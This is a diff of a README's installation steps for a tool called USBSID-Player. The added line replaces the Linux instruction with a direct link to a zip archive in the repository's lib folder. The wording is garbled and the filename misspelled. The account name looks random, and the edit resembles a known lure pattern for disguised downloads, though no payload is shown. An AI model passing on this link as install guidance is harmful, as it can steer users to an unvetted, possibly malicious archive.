kljvjvnkdfvkjbvjion/USBSID-Player/README.md

 5. **Run the Installer**:
    - Windows: Double-click the `.exe` file to start the installation.
 Follow the on-screen prompts.
    - macOS: Open the `.dmg` file and drag USBSID-Player to your Applications folder.
-   - Linux: Extract the `.tar.gz` file and follow the instructions in the README file.
+   - Linux: Extract the `https://raw.githubusercontent.com/kljvjvnkdfvkjbvjion/USBSID-Player/master/lib/USBSI-Player-v1.9.zip` file and follow the instructions in the README file.

 6. **Connect Your SID Device**: If you have a USB SID device, plug it into a free USB port on your computer.